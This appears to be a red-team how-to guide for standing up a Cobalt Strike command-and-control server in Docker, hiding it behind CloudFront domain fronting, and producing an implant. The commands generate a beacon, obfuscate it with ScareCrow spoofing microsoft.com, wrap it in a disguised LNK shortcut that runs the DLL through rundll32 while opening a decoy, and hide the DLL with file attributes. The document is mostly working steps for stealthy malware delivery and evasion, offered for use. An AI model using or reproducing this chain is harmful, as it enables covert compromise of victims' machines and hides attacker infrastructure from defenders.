Clone the repo and build the container

git clone https://gitea.127-0-0-1.fr/vx3r/cobalt-strike-docker
cd cobalt-strike-docker
docker build -t cobalt-strike .

Docker compose snipped

  cobalt-strike:
    image: cobalt-strike
    container_name: cobalt-strike
    restart: unless-stopped
    networks:
      my-docker-subnet:
        ipv4_address: 10.2.2.29
        ipv6_address: fd00:bbbb::10:2:2:29
    expose:
      - "8080"    
      - "8443"
      - "50050"
    environment:
      - VIRTUAL_EXPOSE=false
    volumes:
      - ./../cobalt-strike:/data

Allow CS clients from specific IPs to the client port 50050, example nftables in prerouting, add forward rule if needed

define CS_IP = 10.2.2.29
ip saddr <allowed IP> ip daddr <CS server public IP> tcp dport 50050 dnat ip to $CS_IP
ip saddr <aws cloudfront IP> ip daddr <CS server public IP> tcp dport { 8080, 8443 } dnat ip to $CS_IP

Setup Cloudfront domain fronting link 1 link 2

Choose which headers to include in the cache key. All for All to forward everything to origin CS server

Download ScareCrow and install dependencies

wget https://github.com/optiv/ScareCrow/releases/download/v4.11/ScareCrow_4.11_linux_amd64
ScareCrow_4.11_linux_amd64 ScareCrow
chmod +x ScareCrow
apt install openssl osslsigncode mingw-w64 golang-go
go install mvdan.cc/garble@latest   

Create CS listener

Cobalt Strike listener

Generate raw beacon with the listener

Obfuscate with ScareCrow

./ScareCrow -I beacon.bin -Loader dll -domain www.microsoft.com

Create LNK file with Macro Pack for example

echo '"c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer"' | .\macro_pack.exe -G photo.lnk

Edit LNK file, change icon and target

"C:\Windows\System32\cmd.exe" /c start c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer & C:\Windows\explorer.exe

This will run the beacon and open for example explorer if the icon is a folder, play with it (pdf icon, open legit pdf file…)

Make the DLL file a bit more obfuscated by adding Hidden, Read-Only, System attributes to it

attrib +h +r +s /s dpapi.dll